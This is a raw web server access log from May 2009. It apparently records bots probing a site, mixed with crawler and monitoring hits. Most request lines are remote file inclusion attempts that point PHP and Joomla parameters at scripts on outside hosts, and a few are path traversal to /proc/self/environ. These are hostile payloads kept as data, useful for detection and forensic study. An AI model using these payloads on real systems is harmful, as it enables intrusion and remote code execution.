222.122.140.8 - - [23/May/2009:05:08:17 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 251 "-" "XXXXXX"
222.122.140.8 - - [23/May/2009:05:08:17 -0400] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "XXXXXX"
86.39.131.85 - - [23/May/2009:05:08:19 -0400] "GET /logs/access_log.Q108110900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.200.8.89 - - [23/May/2009:05:08:21 -0400] "GET /logs/access_log.Q109051200/config%5broot_dir%5d=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:08:35 -0400] "GET /logs/access_log.Q108110900%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:05:09:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20815D4B17D14700E14D04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.11.230.36 - - [23/May/2009:05:09:35 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:09:35 -0400] "GET /logs/access_log.Q108111500%20%20/index.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:09:35 -0400] "GET /logs/access_log.Q108090100%20%20/index.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:09:35 -0400] "GET /index.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:09:35 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:09:55 -0400] "GET /logs/access_log.Q108110900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:10:39 -0400] "GET /logs/access_log.Q108090100/index.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:05:11:10 -0400] "GET /logs/access_log.Q108112400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:05:11:10 -0400] "GET /logs/access_log.Q108091400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:11:17 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:11:17 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:11:17 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:11:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [23/May/2009:05:11:23 -0400] "GET /logs/access_log.Q108091400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:05:11:30 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:11:59 -0400] "GET //include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:11:59 -0400] "GET /logs/access_log.Q109050900%20%20//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:11:59 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:12:00 -0400] "GET /logs/access_log.Q109050700%20%20//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.122.140.8 - - [23/May/2009:05:12:15 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
222.122.140.8 - - [23/May/2009:05:12:15 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
91.206.183.148 - - [23/May/2009:05:14:20 -0400] "GET //include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:14:20 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:14:20 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:14:21 -0400] "GET /logs/access_log.Q109050700//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.125.64.49 - - [23/May/2009:05:14:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.237.82.158 - - [23/May/2009:05:14:49 -0400] "GET /logs/access_log.Q109050900%20%20//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:14:50 -0400] "GET //include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:14:50 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:14:53 -0400] "GET /logs/access_log.Q109050700%20%20//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:05:14:53 -0400] "GET /images/index7_suturneedls.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.11.230.36 - - [23/May/2009:05:15:03 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:15:03 -0400] "GET /logs/access_log.Q108111500/mainbody.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:15:03 -0400] "GET /logs/access_log.Q108090100%20%20/mainbody.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:15:04 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:15:04 -0400] "GET /logs/access_log.Q108111500%20%20/mainbody.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:05:16:04 -0400] "GET /logs/access_log.Q108090100/mainbody.php?option=com_custompages&cpage=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:17:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.51 - - [23/May/2009:05:17:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.237.82.158 - - [23/May/2009:05:17:55 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:18:07 -0400] "GET //include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:18:07 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:18:09 -0400] "GET /logs/access_log.Q109050700//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:05:19:22 -0400] "GET /logs/error_log.Q107052200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.237.82.158 - - [23/May/2009:05:21:02 -0400] "GET //include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:21:02 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:21:02 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:21:13 -0400] "GET /logs/access_log.Q109050700//include/lib.inc.php?site_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:22:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.246.62.35 - - [23/May/2009:05:22:37 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:22:59 -0400] "GET /errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:22:59 -0400] "GET /logs/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:22:59 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:13 -0400] "GET /errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:13 -0400] "GET /logs/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:13 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:15 -0400] "GET /errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:15 -0400] "GET /logs/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:15 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:29 -0400] "GET /errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:29 -0400] "GET /logs/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:29 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:49 -0400] "GET /errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:49 -0400] "GET /logs/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:05:23:49 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:27:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.232.66.198 - - [23/May/2009:05:28:13 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:13 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:13 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:18 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:22 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:22 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:22 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:24 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:24 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:24 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:26 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:26 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:26 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:28 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:32 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:32 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:32 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:34 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:34 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:34 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:36 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:36 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:36 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:37 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:37 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:28:37 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:46 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:46 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:46 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:47 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:47 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:47 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:48 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:48 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:48 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:55 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:55 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:28:55 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:05:29:22 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:05:29:22 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:05:30:05 -0400] "GET /logs/access_log.Q109051100%20%20//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:31:58 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:31:58 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:31:58 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:32:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.232.66.198 - - [23/May/2009:05:32:06 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:32:07 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.232.66.198 - - [23/May/2009:05:32:07 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.224.21 - - [23/May/2009:05:32:18 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
213.189.224.21 - - [23/May/2009:05:32:18 -0400] "GET /logs/access_log.Q109051100//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
213.189.224.21 - - [23/May/2009:05:32:18 -0400] "GET //include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
91.206.183.148 - - [23/May/2009:05:32:29 -0400] "GET //components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:32:29 -0400] "GET /logs/access_log.Q108110900%20%20//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:32:29 -0400] "GET /logs//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:34:12 -0400] "GET /logs//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:34:13 -0400] "GET //components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:34:15 -0400] "GET /logs/access_log.Q108110900%20%20//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:05:34:49 -0400] "GET /logs/access_log.Q108090400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.206.183.148 - - [23/May/2009:05:35:00 -0400] "GET //components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:35:00 -0400] "GET /logs//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:05:35:00 -0400] "GET /logs/access_log.Q108110900//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:35:22 -0400] "GET //components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:35:22 -0400] "GET /logs/access_log.Q108110900//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:35:26 -0400] "GET /logs//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:37:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.109.101.217 - - [23/May/2009:05:37:10 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:05:37:10 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:05:37:10 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:37:17 -0400] "GET //index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:37:17 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [23/May/2009:05:37:17 -0400] "GET /logs//index.php?_shop_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:37:26 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:37:26 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:37:26 -0400] "GET /logs/access_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:37:26 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:05:37:26 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
